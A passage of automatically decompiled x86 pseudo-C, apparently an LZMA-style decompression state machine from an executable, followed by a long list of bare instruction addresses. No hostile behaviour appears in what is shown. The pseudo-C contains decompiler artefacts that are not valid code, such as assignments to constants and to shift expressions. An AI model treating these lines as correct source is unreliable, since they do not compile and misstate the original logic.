								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406690
0x00406690
0x00406694
0x0040674b
0x0040674e
0x0040675a
0x0040663b
0x0040663b
0x0040663e
0x004069b0
0x004069b0
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00406a26
0x00406a26
0x00406a2c
0x00406a2c
0x00000000
0x00406a01
0x00406a01
0x00406a05
0x00406bb4
0x00000000
0x00406bb4
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00000000
0x00406a23
0x0040669a
0x0040669e
0x00406bdf
0x00406bdf
0x00406be2
0x00406be6
0x00406be6
0x004066a4
0x004066aa
0x004066ad
0x004066b1
0x004066b4
0x004066b8
0x00406b7e
0x00406bca
0x00406bd2
0x00406bd9
0x00406bdb
0x00000000
0x00406bdb
0x004066be
0x004066c1
0x004066c7
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x004066f2
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x00000000
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x00000000
0x004063d1
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b4
0x00000000
0x00406396
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x004063ad
0x00000000
0x004065e3
0x004065e7
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x00000000
0x00000000
0x0040664d
0x00406651
0x00406674
0x00406677
0x0040667a
0x00406684
0x00406653
0x00406653
0x00406656
0x00406659
0x0040665c
0x00406669
0x0040666c
0x0040666c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406701
0x00406705
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x00000000
0x0040671c
0x00406707
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
